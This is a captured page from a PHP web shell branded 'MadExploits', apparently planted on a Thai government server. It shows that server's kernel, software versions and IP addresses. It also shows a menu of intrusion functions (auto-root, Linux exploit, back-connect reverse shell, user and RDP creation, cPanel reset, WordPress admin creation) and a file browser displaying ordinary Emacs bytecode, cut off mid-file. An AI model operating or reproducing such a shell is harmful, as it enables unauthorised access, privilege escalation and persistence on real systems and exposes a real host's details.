Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
nxml /
[ HOME SHELL ]
Name
Size
Permission
Action
TODO
13.76
KB
-rw-r--r--
nxml-enc.elc
3.56
KB
-rw-r--r--
nxml-glyph.elc
7.8
KB
-rw-r--r--
nxml-maint.elc
2.24
KB
-rw-r--r--
nxml-mode.elc
69.67
KB
-rw-r--r--
nxml-ns.elc
4.19
KB
-rw-r--r--
nxml-outln.elc
28.22
KB
-rw-r--r--
nxml-parse.elc
8.77
KB
-rw-r--r--
nxml-rap.elc
11.25
KB
-rw-r--r--
nxml-uchnm.elc
6.77
KB
-rw-r--r--
nxml-util.elc
4.41
KB
-rw-r--r--
rng-cmpct.elc
26.68
KB
-rw-r--r--
rng-dt.elc
1.97
KB
-rw-r--r--
rng-loc.elc
14.76
KB
-rw-r--r--
rng-maint.elc
6.12
KB
-rw-r--r--
rng-match.elc
47.01
KB
-rw-r--r--
rng-nxml.elc
14.93
KB
-rw-r--r--
rng-parse.elc
2.82
KB
-rw-r--r--
rng-pttrn.elc
3.69
KB
-rw-r--r--
rng-uri.elc
7.79
KB
-rw-r--r--
rng-util.elc
4.05
KB
-rw-r--r--
rng-valid.elc
35.72
KB
-rw-r--r--
rng-xsd.elc
24.32
KB
-rw-r--r--
xmltok.elc
39.71
KB
-rw-r--r--
xsd-regexp.elc
40.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xsd-regexp.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:38 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/nxml/xsd-regexp.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`xsd-regexp.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@186 Translate a W3C XML Schema Datatypes regexp to an Emacs regexp. Returns a string. REGEXP is a string. If REGEXP is not a valid XSD regexp, signal an `xsdre-invalid-regexp' condition. (defalias 'xsdre-translate #[(regexp) "\301\302!!\207" [regexp xsdre-from-symbolic xsdre-to-symbolic] 3 (#$ . 617)]) (byte-code "\301B\302\301!\204 \303\301\304\"\210\304\207" [current-load-list xsdre-test-history default-boundp set-default nil] 3) (defalias 'xsdre-test-regexp #[nil "\302\303\304\211\211\305%\306!\307\220\310\311!\210\310!\210\310\312!\210\310\313!\210\310\312!\210\314 !\210\310\312!\210\310\315!\210\310\316 !!\221\210*\202 " [str symbolic read-from-minibuffer "Regexp: " nil xsdre-test-history xsdre-to-symbolic "*XSD Regexp Test*" princ "XSD regexp: " "\n" "Symbolic: " pp "Emacs regexp: " xsdre-from-symbolic] 6 nil nil]) #@179 Return a representation of a range of integers. If the range contains a single integer, it is represented by that integer. Otherwise, it is represented by a (FIRST . LAST) pair. (defalias 'xsdre-make-range #[(first last) " U\203 \207 B\207" [first last] 2 (#$ . 1464)]) (put 'xsdre-make-range 'byte-optimizer 'byte-compile-inline-expand) #@38 Return the first integer in a range. (defalias 'xsdre-range-first #[(r) ":\203 @\207\207" [r] 1 (#$ . 1812)]) (put 'xsdre-range-first 'byte-optimizer 'byte-compile-inline-expand) #@37 Return the last integer in a range. (defalias 'xsdre-range-last #[(r) ":\203 A\207\207" [r] 1 (#$ . 2001)]) (put 'xsdre-range-last 'byte-optimizer 'byte-compile-inline-expand) #@216 Make a range-list from a list of ranges. A range-list represents a set of integers by a list of ranges in a canonical form, in which ranges are in increasing order, and adjacent ranges are merged wherever possible. (defalias 'xsdre-make-range-list #[(list) "\205\327 \306\307\"\211A@\211\211:\203 \f@\202 \f)\211:\203, \fA\202- \f) \203\270 @\211\211:\203C \fA\202D \f) V\203\261 \211:\203W \f@\202X \f) TX\203s \211:\203l \fA\202m \f) \202\261 \n \211 U\203\205 \202\211 B*\240\210\n \241\210 \211:\203\236 \f@\202\237 \f)\211:\203\255 \fA\202\256 \f) A\211\2044 \n \211 U\203\312 \202\316 B*\240\210\n\310\241\210-\207" [list next tail head r first sort xsdre-range-less-than nil last] 4 (#$ . 2188)]) #@58 Return a range-list, the union of a list of range-lists. (defalias 'xsdre-range-list-union #[(range-lists) "\301\302\303\"!\207" [range-lists xsdre-make-range-list apply append] 4 (#$ . 2954)]) #@60 Return a range-list for the difference of two range-lists. (defalias 'xsdre-range-list-difference #[(orig subtract) "\205#\306\211\211\211\211\203 @\211\211:\203# @\202% )\f\211:\2035 A\2027 )\203_ @\211:\203N A\202P )\nW\203_ A\211\204>